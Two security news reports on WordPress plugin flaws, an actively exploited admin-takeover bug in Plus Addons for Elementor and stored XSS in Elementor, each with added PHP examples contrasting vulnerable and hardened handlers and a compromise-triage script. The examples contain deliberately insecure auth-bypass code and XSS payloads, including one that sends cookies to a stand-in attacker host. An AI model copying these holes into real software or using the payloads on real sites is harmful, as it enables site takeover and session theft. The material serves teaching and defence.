Cyberattackers Exploiting Critical WordPress Plugin Bug


mood

The security hole in the Plus Addons for Elementor plugin was used in active zero-day attacks prior to a patch being issued.


The Plus Addons for Elementor plugin for WordPress has a critical security vulnerability that attackers can exploit to quickly, easily and remotely take over a website. First reported as a zero-day bug, researchers said it’s being actively attacked in the wild.


The plugin, which has more than 30,000 active installations according to its developer, allows site owners to create various user-facing widgets for their websites, including user logins and registration forms that can be added to an Elementor page. Elementor is a site-building tool for WordPress.


The bug (CVE-2021-24175) is a privilege-escalation and authentication-bypass issue that exists in this registration form function of the Plus Addons for Elementor. It rates 9.8 on the CVSS vulnerability scale, making it critical in severity.

“Unfortunately, this functionality was improperly configured and allowed attackers to register as an administrative user, or to log in as an existing administrative user,” according to researchers at Wordfence, in a posting this week. They added that it arises from broken session management, but didn’t provide further technical details.

Exploited as a Zero-Day Bug

The bug was first reported to WPScan by Seravo, a web-hosting company, as a zero-day under active attack by cybercriminals.

“The plugin is being actively exploited by malicious actors to bypass authentication, allowing unauthenticated users to log in as any user (including admin) by just providing the related username, as well as create accounts with arbitrary roles, such as admin,” according to WPScan’s overview.


As for how cybercriminals are using the exploit in the wild, Wordfence noted that indicators of compromise point to attackers creating privileged accounts and then using them to further compromise the site.

“We believe that attackers are adding user accounts with usernames as the registered email address based on how the vulnerability creates user accounts, and in some cases installing a malicious plugin labeled ‘wpstaff,’” researchers said.


Worryingly, they added that the vulnerability can still be exploited even if there’s no active login or registration page that was created with the plugin, and even if registration and logins are suspended or disabled.

“This means that any site running this plugin is vulnerable to compromise,” according to the Wordfence posting.

How to Fix the Plus Addons for Elementor Security Vulnerability

The vulnerability was reported on Monday, and fully patched a day later. Site admins should upgrade to version 4.1.7 of The Plus Addons for Elementor to avoid compromise, and they should check for “any unexpected administrative users or plugins you did not install,” according to Wordfence. The Plus Addons for Elementor Lite does not contain the same vulnerability, the firm added.

“If you are using The Plus Addons for Elementor plugin, we strongly recommend that you deactivate and remove the plugin completely until this vulnerability is patched,” researchers said. “If the free version will suffice for your needs, you can switch to that version for the time being.”

WordPress Plugin Problems Persist

WordPress plugins continue to offer an attractive avenue of attack for cybercriminals.


In January, researchers warned of two vulnerabilities (one critical) in a WordPress plugin called Orbit Fox that could allow attackers to inject malicious code into vulnerable websites and/or take control of a website.


Also that month, a plugin called PopUp Builder, used by WordPress websites for building pop-up ads for newsletter subscriptions, was found to have a vulnerability that could be exploited by attackers to send out newsletters with custom content, or to delete or import newsletter subscribers.


And in February, an unpatched, stored cross-site scripting (XSS) security bug was found to potentially affect 50,000 Contact Form 7 Style plugin users.


Source: Cyberattackers Exploiting Critical WordPress Plugin Bug

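The report gives only the two observable behaviours of CVE-2021-24175 (an unauthenticated caller can register with a role of its choosing, and can be logged in as any existing user from a username alone). The following is an added, illustrative reconstruction of that bug class next to a hardened handler; it is not the plugin's actual code, which the article does not show. The AJAX action names, function names and nonce actions are invented, and the code assumes it is loaded as part of a WordPress plugin. Binding the handlers with `wp_ajax_nopriv_` also shows one common reason a form handler stays reachable when no page embeds the widget and registration is switched off: the hook is registered when the plugin loads, not when a widget renders, so `admin-ajax.php` will route to it regardless.

```php
<?php
/**
 * Added example: reconstruction of the reported bug class beside a hardened
 * version. NOT the plugin's real code; all action/function names are invented.
 * Both pairs are bound with wp_ajax_nopriv_*, i.e. reachable by anonymous
 * callers at /wp-admin/admin-ajax.php as soon as the plugin is active.
 */

// ---- Vulnerable pattern ---------------------------------------------------
add_action( 'wp_ajax_nopriv_example_register', 'example_register_vulnerable' );
function example_register_vulnerable() {
    // The role is taken straight from the request: role=administrator works.
    // No nonce, and get_option('users_can_register') is never consulted.
    $user_id = wp_insert_user( array(
        'user_login' => $_POST['email'],      // username == e-mail, the IOC Wordfence describes
        'user_email' => $_POST['email'],
        'user_pass'  => $_POST['password'],
        'role'       => $_POST['role'],
    ) );
    if ( ! is_wp_error( $user_id ) ) {
        wp_set_auth_cookie( $user_id );      // and the new admin is logged in immediately
    }
    wp_send_json_success();
}

add_action( 'wp_ajax_nopriv_example_login', 'example_login_vulnerable' );
function example_login_vulnerable() {
    // A session is created from a username alone; no password is ever checked.
    $user = get_user_by( 'login', $_POST['username'] );
    if ( $user ) {
        wp_set_current_user( $user->ID );
        wp_set_auth_cookie( $user->ID );
    }
    wp_send_json_success();
}

// ---- Hardened pattern -----------------------------------------------------
add_action( 'wp_ajax_nopriv_example_register_safe', 'example_register_hardened' );
function example_register_hardened() {
    // Honour the site-wide registration switch and require a nonce tied to the form.
    // wp_send_json_error() calls wp_die(), so execution stops here on failure.
    if ( ! get_option( 'users_can_register' ) || ! check_ajax_referer( 'example_register', 'nonce', false ) ) {
        wp_send_json_error( 'registration not permitted', 403 );
    }
    $email = sanitize_email( wp_unslash( $_POST['email'] ?? '' ) );
    $pass  = (string) ( $_POST['password'] ?? '' );
    if ( ! is_email( $email ) || strlen( $pass ) < 12 ) {
        wp_send_json_error( 'invalid input', 400 );
    }
    // The role never comes from the request. Use the site default, and refuse
    // to mint anything that can manage users or publish (defence in depth in
    // case an admin set default_role to something privileged).
    $role = get_option( 'default_role', 'subscriber' );
    $caps = get_role( $role ) ? get_role( $role )->capabilities : array();
    if ( ! empty( $caps['edit_users'] ) || ! empty( $caps['publish_posts'] ) ) {
        $role = 'subscriber';
    }
    $user_id = wp_insert_user( array(
        'user_login' => sanitize_user( strstr( $email, '@', true ), true ), // local part, not the e-mail
        'user_email' => $email,
        'user_pass'  => $pass,
        'role'       => $role,
    ) );
    if ( is_wp_error( $user_id ) ) {
        wp_send_json_error( 'could not register', 400 ); // also covers an existing login/e-mail
    }
    wp_send_json_success( array( 'id' => $user_id ) );
}

add_action( 'wp_ajax_nopriv_example_login_safe', 'example_login_hardened' );
function example_login_hardened() {
    if ( ! check_ajax_referer( 'example_login', 'nonce', false ) ) {
        wp_send_json_error( 'bad nonce', 403 );
    }
    // wp_signon() verifies the password hash and runs the normal 'authenticate'
    // filter chain (so lockout / 2FA plugins still apply) before it sets any cookie.
    $user = wp_signon( array(
        'user_login'    => sanitize_user( wp_unslash( $_POST['username'] ?? '' ) ),
        'user_password' => (string) ( $_POST['password'] ?? '' ),
        'remember'      => false,
    ), is_ssl() );
    if ( is_wp_error( $user ) ) {
        wp_send_json_error( 'invalid credentials', 401 ); // same message for unknown user and wrong password
    }
    wp_send_json_success( array( 'id' => $user->ID ) );
}
```

The two properties to check in any registration or login widget are visible in the hardened half: the role is decided by the server, never by the request, and an authentication cookie is only ever set after a credential has actually been verified. Whether a page embeds the form is irrelevant to either; the handler is what is exposed.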


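Wordfence's advice above is to look for unexpected administrators and plugins, with two concrete indicators: admin accounts whose username is the registered e-mail address, and a plugin labeled ‘wpstaff’. The script below is an added triage example (not Wordfence's tooling) that runs those checks inside WordPress, e.g. with `wp eval-file triage.php`. The known-admin and known-plugin lists, the 14-day look-back window and the matching of the Plus Addons plugin by its header Name are assumptions to be filled in from the site owner's own records.

```php
<?php
/**
 * Added example: post-incident triage for the indicators in the report.
 * Run inside WordPress, e.g. `wp eval-file triage.php`.
 * Assumptions: $known_admins / $known_plugins come from your own inventory,
 * the look-back window is 14 days, and the Plus Addons plugin is matched by
 * its "Name" header (adjust if your copy reports a different name).
 */
require_once ABSPATH . 'wp-admin/includes/plugin.php'; // provides get_plugins()

$known_admins  = array( 'siteowner' );                  // logins you recognise (assumption)
$known_plugins = array( 'elementor/elementor.php' );    // plugin files you installed (assumption)
$since         = gmdate( 'Y-m-d H:i:s', time() - 14 * DAY_IN_SECONDS );

echo "== Administrator accounts ==\n";
foreach ( get_users( array( 'role' => 'administrator' ) ) as $u ) {
    $flags = array();
    if ( ! in_array( $u->user_login, $known_admins, true ) ) {
        $flags[] = 'not in known-admin list';
    }
    // IOC: the exploit created accounts whose username is the e-mail address.
    if ( is_email( $u->user_login ) || strcasecmp( $u->user_login, $u->user_email ) === 0 ) {
        $flags[] = 'login is an e-mail address';
    }
    if ( $u->user_registered >= $since ) {
        $flags[] = 'registered within look-back window';
    }
    printf( "%-6d %-40s %-20s %s\n", $u->ID, $u->user_login, $u->user_registered,
        $flags ? 'SUSPECT: ' . implode( ', ', $flags ) : 'ok' );
}

echo "\n== Installed plugins ==\n";
$active = (array) get_option( 'active_plugins', array() );
foreach ( get_plugins() as $file => $meta ) {
    $flags = array();
    if ( ! in_array( $file, $known_plugins, true ) ) {
        $flags[] = 'not in known-plugin list';
    }
    // IOC: a malicious plugin labeled "wpstaff" (match on directory or header).
    if ( stripos( $file, 'wpstaff' ) !== false || stripos( $meta['Name'], 'wpstaff' ) !== false ) {
        $flags[] = 'matches reported IOC name';
    }
    // Dropped backdoors frequently ship with empty metadata.
    if ( empty( $meta['Author'] ) && empty( $meta['PluginURI'] ) ) {
        $flags[] = 'no Author/PluginURI headers';
    }
    // The paid plugin is fixed in 4.1.7; the Lite edition is reported unaffected.
    if ( stripos( $meta['Name'], 'Plus Addons for Elementor' ) !== false
         && stripos( $meta['Name'], 'Lite' ) === false
         && version_compare( $meta['Version'], '4.1.7', '<' ) ) {
        $flags[] = 'Plus Addons below patched 4.1.7';
    }
    printf( "%-60s %-8s %s\n", $file,
        in_array( $file, $active, true ) ? 'active' : 'inactive',
        $flags ? 'SUSPECT: ' . implode( ', ', $flags ) : 'ok' );
}
```

Treat every SUSPECT line as something to explain, not as a verdict: a legitimate admin may well have registered with an e-mail-style login. Because the attackers were seen installing a plugin after obtaining an admin session, a clean user list does not clear the site on its own; the plugin list (including inactive plugins) has to be reviewed as well.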

Flaws in Two Popular WordPress Plugins Affect Over 7 Million Websites

Researchers have disclosed vulnerabilities in multiple WordPress plugins that, if successfully exploited, could allow an attacker to run arbitrary code and take over a website in certain scenarios.


The flaws were uncovered in Elementor, a website builder plugin used on more than seven million sites, and WP Super Cache, a tool used to serve cached pages of a WordPress site.


According to Wordfence, which discovered the security weaknesses in Elementor, the bug concerns a set of stored cross-site scripting (XSS) vulnerabilities (CVSS score: 6.4), which occurs when a malicious script is injected directly into a vulnerable web application.


In this case, due to a lack of validation of the HTML tags on the server-side, a bad actor can exploit the issues to add executable JavaScript to a post or page via a crafted request.

"Since posts created by contributors are typically reviewed by editors or administrators before publishing, any JavaScript added to one of these posts would be executed in the reviewer's browser," Wordfence said in a technical write-up. "If an administrator reviewed a post containing malicious JavaScript, their authenticated session with high-level privileges could be used to create a new malicious administrator, or to add a backdoor to the site. An attack on this vulnerability could lead to site takeover."


Multiple HTML elements such as Heading, Column, Accordion, Icon Box, and Image Box were found vulnerable to the stored XSS attack, thereby making it possible for any user who can access the Elementor editor to add executable JavaScript.


Given that the flaws take advantage of the fact that dynamic data entered in a template could be leveraged to include malicious scripts intended to launch XSS attacks, such behavior can be thwarted by validating the input and escaping the output data so that the HTML tags passed as inputs are rendered harmless.


Separately, an authenticated remote code execution (RCE) vulnerability was discovered in WP Super Cache that could allow an adversary to upload and execute malicious code with the goal of gaining control of the site. The plugin is reported to be used on more than two million WordPress sites.


Following responsible disclosure on February 23, Elementor fixed the issues in version 3.1.4 released on March 8 by hardening "allowed options in the editor to enforce better security policies." Likewise, Automattic, the developer behind WP Super Cache, said it addressed the "authenticated RCE in the settings page" in version 1.7.2.


It's highly recommended that users of the plugins update to the latest versions to mitigate the risk associated with the flaws.


Source: Flaws in Two Popular WordPress Plugins Affect Over 7 Million Websites

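The Elementor issue above is a server-side validation gap: a widget's HTML tag and content are taken from settings a Contributor saved and rendered as-is, so they execute in the browser of the Editor or Administrator who reviews the post. The following is an added illustration of that bug class (not Elementor's code, whose widget internals the article does not show) with a hardened renderer beside it: the tag name is checked against an allowlist, attribute values go through `esc_attr()`, and rich content goes through `wp_kses_post()`. The setting names, function names and attacker payloads are constructed for the example; it assumes WordPress is loaded (e.g. `wp eval-file xss-demo.php`).

```php
<?php
/**
 * Added example: the stored-XSS pattern described in the write-up, beside a
 * hardened renderer. Not Elementor's code; setting/function names are invented.
 * Requires WordPress to be loaded (esc_attr, wp_kses_post).
 */

// Settings as an attacker with the Contributor role could store them by editing
// the editor's save request (constructed payloads; the UI itself only offers
// h1-h6/div/span/p for the tag, but that is a client-side restriction).
$attacker_settings = array(
    'header_tag'  => 'script',
    'css_class'   => '" onmouseover="alert(document.cookie)',
    'title'       => 'document.location="https://attacker.example/?c="+document.cookie',
    'description' => '<img src=x onerror="alert(document.domain)">Q3 numbers',
);

function render_heading_vulnerable( array $s ) {
    // Trusts every stored setting: tag, attribute and content go out unfiltered.
    // With the payload above this emits a <script> element whose body is the
    // attacker's JavaScript, executed by whoever previews the post.
    return sprintf(
        '<%1$s class="%2$s">%3$s</%1$s><p>%4$s</p>',
        $s['header_tag'], $s['css_class'], $s['title'], $s['description']
    );
}

function render_heading_hardened( array $s ) {
    // 1. The tag name must be one of a fixed allowlist; anything else becomes h2.
    $allowed_tags = array( 'h1', 'h2', 'h3', 'h4', 'h5', 'h6', 'div', 'span', 'p' );
    $tag = strtolower( (string) $s['header_tag'] );
    if ( ! in_array( $tag, $allowed_tags, true ) ) {
        $tag = 'h2';
    }
    // 2. Attribute values are escaped, so a quote cannot close the attribute
    //    and start an event handler.
    $class = esc_attr( $s['css_class'] );
    // 3. Text content is escaped outright; rich content is reduced to the
    //    post-safe subset (<script>, on* handlers and the like are stripped,
    //    ordinary <strong>/<a>/<img src> survive).
    $title       = esc_html( $s['title'] );
    $description = wp_kses_post( $s['description'] );
    return sprintf(
        '<%1$s class="%2$s">%3$s</%1$s><p>%4$s</p>',
        $tag, $class, $title, $description
    );
}

// Same validation belongs on the save path, so bad values never reach the database.
function sanitize_heading_settings( array $s ) {
    $allowed_tags = array( 'h1', 'h2', 'h3', 'h4', 'h5', 'h6', 'div', 'span', 'p' );
    $tag = strtolower( (string) ( $s['header_tag'] ?? 'h2' ) );
    return array(
        'header_tag'  => in_array( $tag, $allowed_tags, true ) ? $tag : 'h2',
        'css_class'   => sanitize_html_class( (string) ( $s['css_class'] ?? '' ) ),
        'title'       => sanitize_text_field( (string) ( $s['title'] ?? '' ) ),
        'description' => wp_kses_post( (string) ( $s['description'] ?? '' ) ),
    );
}

echo "VULNERABLE:\n" . render_heading_vulnerable( $attacker_settings ) . "\n\n";
echo "HARDENED (render-time):\n" . render_heading_hardened( $attacker_settings ) . "\n\n";
echo "HARDENED (save-time):\n" . render_heading_hardened( sanitize_heading_settings( $attacker_settings ) ) . "\n";
```

The reason a plugin has to do this itself: WordPress core only runs its kses filter over `post_content` for users who lack the `unfiltered_html` capability. Settings a page builder stores elsewhere, such as post meta, receive no such treatment, so a Contributor's input reaches the renderer exactly as submitted unless the plugin validates it on save and escapes it on output. Doing both is the point of the "validating the input and escaping the output" remedy the article mentions: the save-time filter keeps bad data out of the database, and the render-time filter still protects the reviewer if some other path wrote the settings.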

